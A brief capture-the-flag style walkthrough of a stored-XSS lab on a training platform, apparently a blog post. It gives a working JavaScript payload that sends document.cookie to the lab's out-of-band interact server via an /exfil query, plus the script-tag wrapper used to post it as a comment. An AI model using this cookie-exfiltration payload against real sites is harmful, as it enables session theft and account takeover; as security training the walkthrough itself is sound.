Lab can be found at: https://webverselabs-pro.com/
Load up the page and you’ll see a vinyl community which looks very retro and hippy:
Browse to the comments, enter an XSS payload and you’ll see a pop:
Go to the interact server (when you hit “Start challenge”, it appears next to the lab launcher) and enter your payload in the edit payload area. Then hit save, then “Copy URL” (in that order).
Payload:
new Image().src='http://55e0e217-3953-inscription-71bfb.interact.webverselabs-pro.com/exfil?flag='+document.cookie;
Now you’ve got the copied URL, you’ll want to get this ready:
<html> <body> <script> <enter your copied URL here> </script> </body> </html>
Post the comment and go back to your interact server. You’ll see hits to /exfil and the query will contain the stolen cookie:
Thanks for following along!
